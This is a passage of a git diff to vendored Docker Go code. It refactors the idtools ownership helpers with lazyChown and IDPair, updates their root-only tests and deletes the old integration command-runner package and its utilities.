ownerUID, ownerGID); err != nil { - return err + + stat, err := system.Stat(path) + if err == nil { + if !stat.IsDir() { + return &os.PathError{Op: "mkdir", Path: path, Err: syscall.ENOTDIR} + } + if !chownExisting { + return nil } + // short-circuit--we were called with an existing directory and chown was requested - return nil - } else if err == nil { - // nothing to do; directory path fully exists already and chown was NOT requested - return nil + return lazyChown(path, ownerUID, ownerGID, stat) + } + + if os.IsNotExist(err) { + paths = []string{path} } if mkAll { @@ -52,7 +58,7 @@ func mkdirAs(path string, mode os.FileMode, ownerUID, ownerGID int, mkAll, chown paths = append(paths, dirPath) } } - if err := system.MkdirAll(path, mode); err != nil && !os.IsExist(err) 
{ + if err := system.MkdirAll(path, mode, ""); err != nil { return err } } else { @@ -63,7 +69,7 @@ func mkdirAs(path string, mode os.FileMode, ownerUID, ownerGID int, mkAll, chown // even if it existed, we will chown the requested path + any subpaths that // didn't exist when we called MkdirAll for _, pathComponent := range paths { - if err := os.Chown(pathComponent, ownerUID, ownerGID); err != nil { + if err := lazyChown(pathComponent, ownerUID, ownerGID, nil); err != nil { return err } } @@ -72,15 +78,15 @@ func mkdirAs(path string, mode os.FileMode, ownerUID, ownerGID int, mkAll, chown // CanAccess takes a valid (existing) directory and a uid, gid pair and determines // if that uid, gid pair has access (execute bit) to the directory -func CanAccess(path string, uid, gid int) bool { +func CanAccess(path string, pair IDPair) bool { statInfo, err := system.Stat(path) if err != nil { return false } fileMode := os.FileMode(statInfo.Mode()) permBits := fileMode.Perm() - return accessible(statInfo.UID() == uint32(uid), - statInfo.GID() == uint32(gid), permBits) + return accessible(statInfo.UID() == uint32(pair.UID), + statInfo.GID() == uint32(pair.GID), permBits) } func accessible(isOwner, isGroup bool, perms os.FileMode) bool { @@ -205,3 +211,20 @@ func callGetent(args string) (io.Reader, error) { } return bytes.NewReader(out), nil } + +// lazyChown performs a chown only if the uid/gid don't match what's requested +// Normally a Chown is a no-op if uid/gid match, but in some cases this can still cause an error, e.g. if the +// dir is on an NFS share, so don't call chown unless we absolutely must. 
+func lazyChown(p string, uid, gid int, stat *system.StatT) error { + if stat == nil { + var err error + stat, err = system.Stat(p) + if err != nil { + return err + } + } + if stat.UID() == uint32(uid) && stat.GID() == uint32(gid) { + return nil + } + return os.Chown(p, uid, gid) +} diff --git a/vendor/github.com/docker/docker/pkg/idtools/idtools_unix_test.go b/vendor/github.com/docker/docker/pkg/idtools/idtools_unix_test.go index 540d3079ee..608000a66b 100644 --- a/vendor/github.com/docker/docker/pkg/idtools/idtools_unix_test.go +++ b/vendor/github.com/docker/docker/pkg/idtools/idtools_unix_test.go @@ -1,14 +1,23 @@ // +build !windows -package idtools +package idtools // import "github.com/docker/docker/pkg/idtools" import ( "fmt" "io/ioutil" "os" + "os/user" "path/filepath" - "syscall" "testing" + + "golang.org/x/sys/unix" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" + "gotest.tools/skip" +) + +const ( + tempUser = "tempuser" ) type node struct { @@ -16,7 +25,8 @@ type node struct { gid int } -func TestMkdirAllAs(t *testing.T) { +func TestMkdirAllAndChown(t *testing.T) { + RequiresRoot(t) dirName, err := ioutil.TempDir("", "mkdirall") if err != nil { t.Fatalf("Couldn't create temp dir: %v", err) @@ -36,7 +46,7 @@ func TestMkdirAllAs(t *testing.T) { } // test adding a directory to a pre-existing dir; only the new dir is owned by the uid/gid - if err := MkdirAllAs(filepath.Join(dirName, "usr", "share"), 0755, 99, 99); err != nil { + if err := MkdirAllAndChown(filepath.Join(dirName, "usr", "share"), 0755, IDPair{UID: 99, GID: 99}); err != nil { t.Fatal(err) } testTree["usr/share"] = node{99, 99} @@ -49,7 +59,7 @@ func TestMkdirAllAs(t *testing.T) { } // test 2-deep new directories--both should be owned by the uid/gid pair - if err := MkdirAllAs(filepath.Join(dirName, "lib", "some", "other"), 0755, 101, 101); err != nil { + if err := MkdirAllAndChown(filepath.Join(dirName, "lib", "some", "other"), 0755, IDPair{UID: 101, GID: 101}); err != nil { t.Fatal(err) 
} testTree["lib/some"] = node{101, 101} @@ -63,7 +73,7 @@ func TestMkdirAllAs(t *testing.T) { } // test a directory that already exists; should be chowned, but nothing else - if err := MkdirAllAs(filepath.Join(dirName, "usr"), 0755, 102, 102); err != nil { + if err := MkdirAllAndChown(filepath.Join(dirName, "usr"), 0755, IDPair{UID: 102, GID: 102}); err != nil { t.Fatal(err) } testTree["usr"] = node{102, 102} @@ -76,12 +86,10 @@ func TestMkdirAllAs(t *testing.T) { } } -func TestMkdirAllNewAs(t *testing.T) { - +func TestMkdirAllAndChownNew(t *testing.T) { + RequiresRoot(t) dirName, err := ioutil.TempDir("", "mkdirnew") - if err != nil { - t.Fatalf("Couldn't create temp dir: %v", err) - } + assert.NilError(t, err) defer os.RemoveAll(dirName) testTree := map[string]node{ @@ -91,53 +99,36 @@ func TestMkdirAllNewAs(t *testing.T) { "lib/x86_64": {45, 45}, "lib/x86_64/share": {1, 1}, } - - if err := buildTree(dirName, testTree); err != nil { - t.Fatal(err) - } + assert.NilError(t, buildTree(dirName, testTree)) // test adding a directory to a pre-existing dir; only the new dir is owned by the uid/gid - if err := MkdirAllNewAs(filepath.Join(dirName, "usr", "share"), 0755, 99, 99); err != nil { - t.Fatal(err) - } + err = MkdirAllAndChownNew(filepath.Join(dirName, "usr", "share"), 0755, IDPair{UID: 99, GID: 99}) + assert.NilError(t, err) + testTree["usr/share"] = node{99, 99} verifyTree, err := readTree(dirName, "") - if err != nil { - t.Fatal(err) - } - if err := compareTrees(testTree, verifyTree); err != nil { - t.Fatal(err) - } + assert.NilError(t, err) + assert.NilError(t, compareTrees(testTree, verifyTree)) // test 2-deep new directories--both should be owned by the uid/gid pair - if err := MkdirAllNewAs(filepath.Join(dirName, "lib", "some", "other"), 0755, 101, 101); err != nil { - t.Fatal(err) - } + err = MkdirAllAndChownNew(filepath.Join(dirName, "lib", "some", "other"), 0755, IDPair{UID: 101, GID: 101}) + assert.NilError(t, err) testTree["lib/some"] = node{101, 101} 
testTree["lib/some/other"] = node{101, 101} verifyTree, err = readTree(dirName, "") - if err != nil { - t.Fatal(err) - } - if err := compareTrees(testTree, verifyTree); err != nil { - t.Fatal(err) - } + assert.NilError(t, err) + assert.NilError(t, compareTrees(testTree, verifyTree)) // test a directory that already exists; should NOT be chowned - if err := MkdirAllNewAs(filepath.Join(dirName, "usr"), 0755, 102, 102); err != nil { - t.Fatal(err) - } + err = MkdirAllAndChownNew(filepath.Join(dirName, "usr"), 0755, IDPair{UID: 102, GID: 102}) + assert.NilError(t, err) verifyTree, err = readTree(dirName, "") - if err != nil { - t.Fatal(err) - } - if err := compareTrees(testTree, verifyTree); err != nil { - t.Fatal(err) - } + assert.NilError(t, err) + assert.NilError(t, compareTrees(testTree, verifyTree)) } -func TestMkdirAs(t *testing.T) { - +func TestMkdirAndChown(t *testing.T) { + RequiresRoot(t) dirName, err := ioutil.TempDir("", "mkdir") if err != nil { t.Fatalf("Couldn't create temp dir: %v", err) @@ -152,7 +143,7 @@ func TestMkdirAs(t *testing.T) { } // test a directory that already exists; should just chown to the requested uid/gid - if err := MkdirAs(filepath.Join(dirName, "usr"), 0755, 99, 99); err != nil { + if err := MkdirAndChown(filepath.Join(dirName, "usr"), 0755, IDPair{UID: 99, GID: 99}); err != nil { t.Fatal(err) } testTree["usr"] = node{99, 99} @@ -165,12 +156,12 @@ func TestMkdirAs(t *testing.T) { } // create a subdir under a dir which doesn't exist--should fail - if err := MkdirAs(filepath.Join(dirName, "usr", "bin", "subdir"), 0755, 102, 102); err == nil { + if err := MkdirAndChown(filepath.Join(dirName, "usr", "bin", "subdir"), 0755, IDPair{UID: 102, GID: 102}); err == nil { t.Fatalf("Trying to create a directory with Mkdir where the parent doesn't exist should have failed") } // create a subdir under an existing dir; should only change the ownership of the new subdir - if err := MkdirAs(filepath.Join(dirName, "usr", "bin"), 0755, 102, 102); err 
!= nil { + if err := MkdirAndChown(filepath.Join(dirName, "usr", "bin"), 0755, IDPair{UID: 102, GID: 102}); err != nil { t.Fatal(err) } testTree["usr/bin"] = node{102, 102} @@ -205,8 +196,8 @@ func readTree(base, root string) (map[string]node, error) { } for _, info := range dirInfos { - s := &syscall.Stat_t{} - if err := syscall.Stat(filepath.Join(base, info.Name()), s); err != nil { + s := &unix.Stat_t{} + if err := unix.Stat(filepath.Join(base, info.Name()), s); err != nil { return nil, fmt.Errorf("Can't stat file %q: %v", filepath.Join(base, info.Name()), err) } tree[filepath.Join(root, info.Name())] = node{int(s.Uid), int(s.Gid)} @@ -242,6 +233,11 @@ func compareTrees(left, right map[string]node) error { return nil } +func delUser(t *testing.T, name string) { + _, err := execCmd("userdel", name) + assert.Check(t, err) +} + func TestParseSubidFileWithNewlinesAndComments(t *testing.T) { tmpDir, err := ioutil.TempDir("", "parsesubid") if err != nil { @@ -269,3 +265,133 @@ dockremap:231072:65536` t.Fatalf("wanted 65536, got %d instead", ranges[0].Length) } } + +func TestGetRootUIDGID(t *testing.T) { + uidMap := []IDMap{ + { + ContainerID: 0, + HostID: os.Getuid(), + Size: 1, + }, + } + gidMap := []IDMap{ + { + ContainerID: 0, + HostID: os.Getgid(), + Size: 1, + }, + } + + uid, gid, err := GetRootUIDGID(uidMap, gidMap) + assert.Check(t, err) + assert.Check(t, is.Equal(os.Geteuid(), uid)) + assert.Check(t, is.Equal(os.Getegid(), gid)) + + uidMapError := []IDMap{ + { + ContainerID: 1, + HostID: os.Getuid(), + Size: 1, + }, + } + _, _, err = GetRootUIDGID(uidMapError, gidMap) + assert.Check(t, is.Error(err, "Container ID 0 cannot be mapped to a host ID")) +} + +func TestToContainer(t *testing.T) { + uidMap := []IDMap{ + { + ContainerID: 2, + HostID: 2, + Size: 1, + }, + } + + containerID, err := toContainer(2, uidMap) + assert.Check(t, err) + assert.Check(t, is.Equal(uidMap[0].ContainerID, containerID)) +} + +func TestNewIDMappings(t *testing.T) { + RequiresRoot(t) + 
_, _, err := AddNamespaceRangesUser(tempUser) + assert.Check(t, err) + defer delUser(t, tempUser) + + tempUser, err := user.Lookup(tempUser) + assert.Check(t, err) + + gids, err := tempUser.GroupIds() + assert.Check(t, err) + group, err := user.LookupGroupId(string(gids[0])) + assert.Check(t, err) + + idMappings, err := NewIDMappings(tempUser.Username, group.Name) + assert.Check(t, err) + + rootUID, rootGID, err := GetRootUIDGID(idMappings.UIDs(), idMappings.GIDs()) + assert.Check(t, err) + + dirName, err := ioutil.TempDir("", "mkdirall") + assert.Check(t, err, "Couldn't create temp directory") + defer os.RemoveAll(dirName) + + err = MkdirAllAndChown(dirName, 0700, IDPair{UID: rootUID, GID: rootGID}) + assert.Check(t, err, "Couldn't change ownership of file path. Got error") + assert.Check(t, CanAccess(dirName, idMappings.RootPair()), fmt.Sprintf("Unable to access %s directory with user UID:%d and GID:%d", dirName, rootUID, rootGID)) +} + +func TestLookupUserAndGroup(t *testing.T) { + RequiresRoot(t) + uid, gid, err := AddNamespaceRangesUser(tempUser) + assert.Check(t, err) + defer delUser(t, tempUser) + + fetchedUser, err := LookupUser(tempUser) + assert.Check(t, err) + + fetchedUserByID, err := LookupUID(uid) + assert.Check(t, err) + assert.Check(t, is.DeepEqual(fetchedUserByID, fetchedUser)) + + fetchedGroup, err := LookupGroup(tempUser) + assert.Check(t, err) + + fetchedGroupByID, err := LookupGID(gid) + assert.Check(t, err) + assert.Check(t, is.DeepEqual(fetchedGroupByID, fetchedGroup)) +} + +func TestLookupUserAndGroupThatDoesNotExist(t *testing.T) { + fakeUser := "fakeuser" + _, err := LookupUser(fakeUser) + assert.Check(t, is.Error(err, "getent unable to find entry \""+fakeUser+"\" in passwd database")) + + _, err = LookupUID(-1) + assert.Check(t, is.ErrorContains(err, "")) + + fakeGroup := "fakegroup" + _, err = LookupGroup(fakeGroup) + assert.Check(t, is.Error(err, "getent unable to find entry \""+fakeGroup+"\" in group database")) + + _, err = 
LookupGID(-1) + assert.Check(t, is.ErrorContains(err, "")) +} + +// TestMkdirIsNotDir checks that mkdirAs() function (used by MkdirAll...) +// returns a correct error in case a directory which it is about to create +// already exists but is a file (rather than a directory). +func TestMkdirIsNotDir(t *testing.T) { + file, err := ioutil.TempFile("", t.Name()) + if err != nil { + t.Fatalf("Couldn't create temp dir: %v", err) + } + defer os.Remove(file.Name()) + + err = mkdirAs(file.Name(), 0755, 0, 0, false, false) + assert.Check(t, is.Error(err, "mkdir "+file.Name()+": not a directory")) +} + +func RequiresRoot(t *testing.T) { + skip.If(t, os.Getuid() != 0, "skipping test that requires root") +} diff --git a/vendor/github.com/docker/docker/pkg/idtools/idtools_windows.go b/vendor/github.com/docker/docker/pkg/idtools/idtools_windows.go index 49f67e78c1..d72cc28929 100644 --- a/vendor/github.com/docker/docker/pkg/idtools/idtools_windows.go +++ b/vendor/github.com/docker/docker/pkg/idtools/idtools_windows.go @@ -1,6 +1,4 @@ -// +build windows - -package idtools +package idtools // import "github.com/docker/docker/pkg/idtools" import ( "os" @@ -11,7 +9,7 @@ import ( // Platforms such as Windows do not support the UID/GID concept. So make this // just a wrapper around system.MkdirAll. 
func mkdirAs(path string, mode os.FileMode, ownerUID, ownerGID int, mkAll, chownExisting bool) error { - if err := system.MkdirAll(path, mode); err != nil && !os.IsExist(err) { + if err := system.MkdirAll(path, mode, ""); err != nil { return err } return nil @@ -20,6 +18,6 @@ func mkdirAs(path string, mode os.FileMode, ownerUID, ownerGID int, mkAll, chown // CanAccess takes a valid (existing) directory and a uid, gid pair and determines // if that uid, gid pair has access (execute bit) to the directory // Windows does not require/support this function, so always return true -func CanAccess(path string, uid, gid int) bool { +func CanAccess(path string, pair IDPair) bool { return true } diff --git a/vendor/github.com/docker/docker/pkg/idtools/usergroupadd_linux.go b/vendor/github.com/docker/docker/pkg/idtools/usergroupadd_linux.go index 9da7975e2c..6272c5a404 100644 --- a/vendor/github.com/docker/docker/pkg/idtools/usergroupadd_linux.go +++ b/vendor/github.com/docker/docker/pkg/idtools/usergroupadd_linux.go @@ -1,4 +1,4 @@ -package idtools +package idtools // import "github.com/docker/docker/pkg/idtools" import ( "fmt" diff --git a/vendor/github.com/docker/docker/pkg/idtools/usergroupadd_unsupported.go b/vendor/github.com/docker/docker/pkg/idtools/usergroupadd_unsupported.go index d98b354cbd..e7c4d63118 100644 --- a/vendor/github.com/docker/docker/pkg/idtools/usergroupadd_unsupported.go +++ b/vendor/github.com/docker/docker/pkg/idtools/usergroupadd_unsupported.go @@ -1,6 +1,6 @@ // +build !linux -package idtools +package idtools // import "github.com/docker/docker/pkg/idtools" import "fmt" diff --git a/vendor/github.com/docker/docker/pkg/idtools/utils_unix.go b/vendor/github.com/docker/docker/pkg/idtools/utils_unix.go index 9703ecbd9d..903ac4501b 100644 --- a/vendor/github.com/docker/docker/pkg/idtools/utils_unix.go +++ b/vendor/github.com/docker/docker/pkg/idtools/utils_unix.go @@ -1,6 +1,6 @@ // +build !windows -package idtools +package idtools // import 
"github.com/docker/docker/pkg/idtools" import ( "fmt" diff --git a/vendor/github.com/docker/docker/pkg/integration/cmd/command.go b/vendor/github.com/docker/docker/pkg/integration/cmd/command.go deleted file mode 100644 index 76d04e8df5..0000000000 --- a/vendor/github.com/docker/docker/pkg/integration/cmd/command.go +++ /dev/null @@ -1,294 +0,0 @@ -package cmd - -import ( - "bytes" - "fmt" - "io" - "os/exec" - "path/filepath" - "runtime" - "strings" - "sync" - "time" - - "github.com/docker/docker/pkg/system" - "github.com/go-check/check" -) - -type testingT interface { - Fatalf(string, ...interface{}) -} - -const ( - // None is a token to inform Result.Assert that the output should be empty - None string = "" -) - -type lockedBuffer struct { - m sync.RWMutex - buf bytes.Buffer -} - -func (buf *lockedBuffer) Write(b []byte) (int, error) { - buf.m.Lock() - defer buf.m.Unlock() - return buf.buf.Write(b) -} - -func (buf *lockedBuffer) String() string { - buf.m.RLock() - defer buf.m.RUnlock() - return buf.buf.String() -} - -// Result stores the result of running a command -type Result struct { - Cmd *exec.Cmd - ExitCode int - Error error - // Timeout is true if the command was killed because it ran for too long - Timeout bool - outBuffer *lockedBuffer - errBuffer *lockedBuffer -} - -// Assert compares the Result against the Expected struct, and fails the test if -// any of the expcetations are not met. 
-func (r *Result) Assert(t testingT, exp Expected) { - err := r.Compare(exp) - if err == nil { - return - } - - _, file, line, _ := runtime.Caller(1) - t.Fatalf("at %s:%d\n%s", filepath.Base(file), line, err.Error()) -} - -// Compare returns an formatted error with the command, stdout, stderr, exit -// code, and any failed expectations -func (r *Result) Compare(exp Expected) error { - errors := []string{} - add := func(format string, args ...interface{}) { - errors = append(errors, fmt.Sprintf(format, args...)) - } - - if exp.ExitCode != r.ExitCode { - add("ExitCode was %d expected %d", r.ExitCode, exp.ExitCode) - } - if exp.Timeout != r.Timeout { - if exp.Timeout { - add("Expected command to timeout") - } else { - add("Expected command to finish, but it hit the timeout") - } - } - if !matchOutput(exp.Out, r.Stdout()) { - add("Expected stdout to contain %q", exp.Out) - } - if !matchOutput(exp.Err, r.Stderr()) { - add("Expected stderr to contain %q", exp.Err) - } - switch { - // If a non-zero exit code is expected there is going to be an error. 
- // Don't require an error message as well as an exit code because the - // error message is going to be "exit status which is not useful - case exp.Error == "" && exp.ExitCode != 0: - case exp.Error == "" && r.Error != nil: - add("Expected no error") - case exp.Error != "" && r.Error == nil: - add("Expected error to contain %q, but there was no error", exp.Error) - case exp.Error != "" && !strings.Contains(r.Error.Error(), exp.Error): - add("Expected error to contain %q", exp.Error) - } - - if len(errors) == 0 { - return nil - } - return fmt.Errorf("%s\nFailures:\n%s\n", r, strings.Join(errors, "\n")) -} - -func matchOutput(expected string, actual string) bool { - switch expected { - case None: - return actual == "" - default: - return strings.Contains(actual, expected) - } -} - -func (r *Result) String() string { - var timeout string - if r.Timeout { - timeout = " (timeout)" - } - - return fmt.Sprintf(` -Command: %s -ExitCode: %d%s, Error: %s -Stdout: %v -Stderr: %v -`, - strings.Join(r.Cmd.Args, " "), - r.ExitCode, - timeout, - r.Error, - r.Stdout(), - r.Stderr()) -} - -// Expected is the expected output from a Command. This struct is compared to a -// Result struct by Result.Assert(). 
-type Expected struct { - ExitCode int - Timeout bool - Error string - Out string - Err string -} - -// Success is the default expected result -var Success = Expected{} - -// Stdout returns the stdout of the process as a string -func (r *Result) Stdout() string { - return r.outBuffer.String() -} - -// Stderr returns the stderr of the process as a string -func (r *Result) Stderr() string { - return r.errBuffer.String() -} - -// Combined returns the stdout and stderr combined into a single string -func (r *Result) Combined() string { - return r.outBuffer.String() + r.errBuffer.String() -} - -// SetExitError sets Error and ExitCode based on Error -func (r *Result) SetExitError(err error) { - if err == nil { - return - } - r.Error = err - r.ExitCode = system.ProcessExitCode(err) -} - -type matches struct{} - -// Info returns the CheckerInfo -func (m *matches) Info() *check.CheckerInfo { - return &check.CheckerInfo{ - Name: "CommandMatches", - Params: []string{"result", "expected"}, - } -} - -// Check compares a result against the expected -func (m *matches) Check(params []interface{}, names []string) (bool, string) { - result, ok := params[0].(*Result) - if !ok { - return false, fmt.Sprintf("result must be a *Result, not %T", params[0]) - } - expected, ok := params[1].(Expected) - if !ok { - return false, fmt.Sprintf("expected must be an Expected, not %T", params[1]) - } - - err := result.Compare(expected) - if err == nil { - return true, "" - } - return false, err.Error() -} - -// Matches is a gocheck.Checker for comparing a Result against an Expected -var Matches = &matches{} - -// Cmd contains the arguments and options for a process to run as part of a test -// suite. 
-type Cmd struct { - Command []string - Timeout time.Duration - Stdin io.Reader - Stdout io.Writer - Dir string - Env []string -} - -// RunCmd runs a command and returns a Result -func RunCmd(cmd Cmd) *Result { - result := StartCmd(cmd) - if result.Error != nil { - return result - } - return WaitOnCmd(cmd.Timeout, result) -} - -// RunCommand parses a command line and runs it, returning a result -func RunCommand(command string, args ...string) *Result { - return RunCmd(Cmd{Command: append([]string{command}, args...)}) -} - -// StartCmd starts a command, but doesn't wait for it to finish -func StartCmd(cmd Cmd) *Result { - result := buildCmd(cmd) - if result.Error != nil { - return result - } - result.SetExitError(result.Cmd.Start()) - return result -} - -func buildCmd(cmd Cmd) *Result { - var execCmd *exec.Cmd - switch len(cmd.Command) { - case 1: - execCmd = exec.Command(cmd.Command[0]) - default: - execCmd = exec.Command(cmd.Command[0], cmd.Command[1:]...) - } - outBuffer := new(lockedBuffer) - errBuffer := new(lockedBuffer) - - execCmd.Stdin = cmd.Stdin - execCmd.Dir = cmd.Dir - execCmd.Env = cmd.Env - if cmd.Stdout != nil { - execCmd.Stdout = io.MultiWriter(outBuffer, cmd.Stdout) - } else { - execCmd.Stdout = outBuffer - } - execCmd.Stderr = errBuffer - return &Result{ - Cmd: execCmd, - outBuffer: outBuffer, - errBuffer: errBuffer, - } -} - -// WaitOnCmd waits for a command to complete. If timeout is non-nil then -// only wait until the timeout. 
-func WaitOnCmd(timeout time.Duration, result *Result) *Result { - if timeout == time.Duration(0) { - result.SetExitError(result.Cmd.Wait()) - return result - } - - done := make(chan error, 1) - // Wait for command to exit in a goroutine - go func() { - done <- result.Cmd.Wait() - }() - - select { - case <-time.After(timeout): - killErr := result.Cmd.Process.Kill() - if killErr != nil { - fmt.Printf("failed to kill (pid=%d): %v\n", result.Cmd.Process.Pid, killErr) - } - result.Timeout = true - case err := <-done: - result.SetExitError(err) - } - return result -} diff --git a/vendor/github.com/docker/docker/pkg/integration/cmd/command_test.go b/vendor/github.com/docker/docker/pkg/integration/cmd/command_test.go deleted file mode 100644 index df23442079..0000000000 --- a/vendor/github.com/docker/docker/pkg/integration/cmd/command_test.go +++ /dev/null @@ -1,118 +0,0 @@ -package cmd - -import ( - "runtime" - "strings" - "testing" - "time" - - "github.com/docker/docker/pkg/testutil/assert" -) - -func TestRunCommand(t *testing.T) { - // TODO Windows: Port this test - if runtime.GOOS == "windows" { - t.Skip("Needs porting to Windows") - } - - var cmd string - if runtime.GOOS == "solaris" { - cmd = "gls" - } else { - cmd = "ls" - } - result := RunCommand(cmd) - result.Assert(t, Expected{}) - - result = RunCommand("doesnotexists") - expectedError := `exec: "doesnotexists": executable file not found` - result.Assert(t, Expected{ExitCode: 127, Error: expectedError}) - - result = RunCommand(cmd, "-z") - result.Assert(t, Expected{ - ExitCode: 2, - Error: "exit status 2", - Err: "invalid option", - }) - assert.Contains(t, result.Combined(), "invalid option") -} - -func TestRunCommandWithCombined(t *testing.T) { - // TODO Windows: Port this test - if runtime.GOOS == "windows" { - t.Skip("Needs porting to Windows") - } - - result := RunCommand("ls", "-a") - result.Assert(t, Expected{}) - - assert.Contains(t, result.Combined(), "..") - assert.Contains(t, result.Stdout(), "..") -} 
- -func TestRunCommandWithTimeoutFinished(t *testing.T) { - // TODO Windows: Port this test - if runtime.GOOS == "windows" { - t.Skip("Needs porting to Windows") - } - - result := RunCmd(Cmd{ - Command: []string{"ls", "-a"}, - Timeout: 50 * time.Millisecond, - }) - result.Assert(t, Expected{Out: ".."}) -} - -func TestRunCommandWithTimeoutKilled(t *testing.T) { - // TODO Windows: Port this test - if runtime.GOOS == "windows" { - t.Skip("Needs porting to Windows") - } - - command := []string{"sh", "-c", "while true ; do echo 1 ; sleep .5 ; done"} - result := RunCmd(Cmd{Command: command, Timeout: 1250 * time.Millisecond}) - result.Assert(t, Expected{Timeout: true}) - - ones := strings.Split(result.Stdout(), "\n") - assert.Equal(t, len(ones), 4) -} - -func TestRunCommandWithErrors(t *testing.T) { - result := RunCommand("/foobar") - result.Assert(t, Expected{Error: "foobar", ExitCode: 127}) -} - -func TestRunCommandWithStdoutStderr(t *testing.T) { - result := RunCommand("echo", "hello", "world") - result.Assert(t, Expected{Out: "hello world\n", Err: None}) -} - -func TestRunCommandWithStdoutStderrError(t *testing.T) { - result := RunCommand("doesnotexists") - - expected := `exec: "doesnotexists": executable file not found` - result.Assert(t, Expected{Out: None, Err: None, ExitCode: 127, Error: expected}) - - switch runtime.GOOS { - case "windows": - expected = "ls: unknown option" - case "solaris": - expected = "gls: invalid option" - default: - expected = "ls: invalid option" - } - - var cmd string - if runtime.GOOS == "solaris" { - cmd = "gls" - } else { - cmd = "ls" - } - result = RunCommand(cmd, "-z") - result.Assert(t, Expected{ - Out: None, - Err: expected, - ExitCode: 2, - Error: "exit status 2", - }) -} diff --git a/vendor/github.com/docker/docker/pkg/integration/utils.go b/vendor/github.com/docker/docker/pkg/integration/utils.go deleted file mode 100644 index f2089c43c4..0000000000 --- a/vendor/github.com/docker/docker/pkg/integration/utils.go +++ /dev/null @@ 
-1,227 +0,0 @@ -package integration - -import ( - "archive/tar" - "errors" - "fmt" - "io" - "os" - "os/exec" - "path/filepath" - "reflect" - "strings" - "syscall" - "time" - - icmd "github.com/docker/docker/pkg/integration/cmd" - "github.com/docker/docker/pkg/stringutils" - "github.com/docker/docker/pkg/system" -) - -// IsKilled process the specified error and returns whether the process was killed or not. -func IsKilled(err error) bool { - if exitErr, ok := err.(*exec.ExitError); ok { - status, ok := exitErr.Sys().(syscall.WaitStatus) - if !ok { - return false - } - // status.ExitStatus() is required on Windows because it does not - // implement Signal() nor Signaled(). Just check it had a bad exit - // status could mean it was killed (and in tests we do kill) - return (status.Signaled() && status.Signal() == os.Kill) || status.ExitStatus() != 0 - } - return false -} - -func runCommandWithOutput(cmd *exec.Cmd) (output string, exitCode int, err error) { - exitCode = 0 - out, err := cmd.CombinedOutput() - exitCode = system.ProcessExitCode(err) - output = string(out) - return -} - -// RunCommandPipelineWithOutput runs the array of commands with the output -// of each pipelined with the following (like cmd1 | cmd2 | cmd3 would do). -// It returns the final output, the exitCode different from 0 and the error -// if something bad happened. 
-func RunCommandPipelineWithOutput(cmds ...*exec.Cmd) (output string, exitCode int, err error) { - if len(cmds) < 2 { - return "", 0, errors.New("pipeline does not have multiple cmds") - } - - // connect stdin of each cmd to stdout pipe of previous cmd - for i, cmd := range cmds { - if i > 0 { - prevCmd := cmds[i-1] - cmd.Stdin, err = prevCmd.StdoutPipe() - - if err != nil { - return "", 0, fmt.Errorf("cannot set stdout pipe for %s: %v", cmd.Path, err) - } - } - } - - // start all cmds except the last - for _, cmd := range cmds[:len(cmds)-1] { - if err = cmd.Start(); err != nil { - return "", 0, fmt.Errorf("starting %s failed with error: %v", cmd.Path, err) - } - } - - defer func() { - var pipeErrMsgs []string - // wait all cmds except the last to release their resources - for _, cmd := range cmds[:len(cmds)-1] { - if pipeErr := cmd.Wait(); pipeErr != nil { - pipeErrMsgs = append(pipeErrMsgs, fmt.Sprintf("command %s failed with error: %v", cmd.Path, pipeErr)) - } - } - if len(pipeErrMsgs) > 0 && err == nil { - err = fmt.Errorf("pipelineError from Wait: %v", strings.Join(pipeErrMsgs, ", ")) - } - }() - - // wait on last cmd - return runCommandWithOutput(cmds[len(cmds)-1]) -} - -// ConvertSliceOfStringsToMap converts a slices of string in a map -// with the strings as key and an empty string as values. -func ConvertSliceOfStringsToMap(input []string) map[string]struct{} { - output := make(map[string]struct{}) - for _, v := range input { - output[v] = struct{}{} - } - return output -} - -// CompareDirectoryEntries compares two sets of FileInfo (usually taken from a directory) -// and returns an error if different. 
-func CompareDirectoryEntries(e1 []os.FileInfo, e2 []os.FileInfo) error { - var ( - e1Entries = make(map[string]struct{}) - e2Entries = make(map[string]struct{}) - ) - for _, e := range e1 { - e1Entries[e.Name()] = struct{}{} - } - for _, e := range e2 { - e2Entries[e.Name()] = struct{}{} - } - if !reflect.DeepEqual(e1Entries, e2Entries) { - return fmt.Errorf("entries differ") - } - return nil -} - -// ListTar lists the entries of a tar. -func ListTar(f io.Reader) ([]string, error) { - tr := tar.NewReader(f) - var entries []string - - for { - th, err := tr.Next() - if err == io.EOF { - // end of tar archive - return entries, nil - } - if err != nil { - return entries, err - } - entries = append(entries, th.Name) - } -} - -// RandomTmpDirPath provides a temporary path with rand string appended. -// does not create or checks if it exists. -func RandomTmpDirPath(s string, platform string) string { - tmp := "/tmp" - if platform == "windows" { - tmp = os.Getenv("TEMP") - } - path := filepath.Join(tmp, fmt.Sprintf("%s.%s", s, stringutils.GenerateRandomAlphaOnlyString(10))) - if platform == "windows" { - return filepath.FromSlash(path) // Using \ - } - return filepath.ToSlash(path) // Using / -} - -// ConsumeWithSpeed reads chunkSize bytes from reader before sleeping -// for interval duration. Returns total read bytes. Send true to the -// stop channel to return before reading to EOF on the reader. -func ConsumeWithSpeed(reader io.Reader, chunkSize int, interval time.Duration, stop chan bool) (n int, err error) { - buffer := make([]byte, chunkSize) - for { - var readBytes int - readBytes, err = reader.Read(buffer) - n += readBytes - if err != nil { - if err == io.EOF { - err = nil - } - return - } - select { - case <-stop: - return - case <-time.After(interval): - } - } -} - -// ParseCgroupPaths parses 'procCgroupData', which is output of '/proc//cgroup', and returns -// a map which cgroup name as key and path as value. 
-func ParseCgroupPaths(procCgroupData string) map[string]string { - cgroupPaths := map[string]string{} - for _, line := range strings.Split(procCgroupData, "\n") { - parts := strings.Split(line, ":") - if len(parts) != 3 { - continue - } - cgroupPaths[parts[1]] = parts[2] - } - return cgroupPaths -} - -// ChannelBuffer holds a chan of byte array that can be populate in a goroutine. -type ChannelBuffer struct { - C chan []byte -} - -// Write implements Writer. -func (c *ChannelBuffer) Write(b []byte) (int, error) { - c.C <- b - return len(b), nil -} - -// Close closes the go channel. -func (c *ChannelBuffer) Close() error { - close(c.C) - return nil -} - -// ReadTimeout reads the content of the channel in the specified byte array with -// the specified duration as timeout. -func (c *ChannelBuffer) ReadTimeout(p []byte, n time.Duration) (int, error) { - select { - case b := <-c.C: - return copy(p[0:], b), nil - case <-time.After(n): - return -1, fmt.Errorf("timeout reading from channel") - } -} - -// RunAtDifferentDate runs the specified function with the given time. -// It changes the date of the system, which can led to weird behaviors. -func RunAtDifferentDate(date time.Time, block func()) { - // Layout for date. 
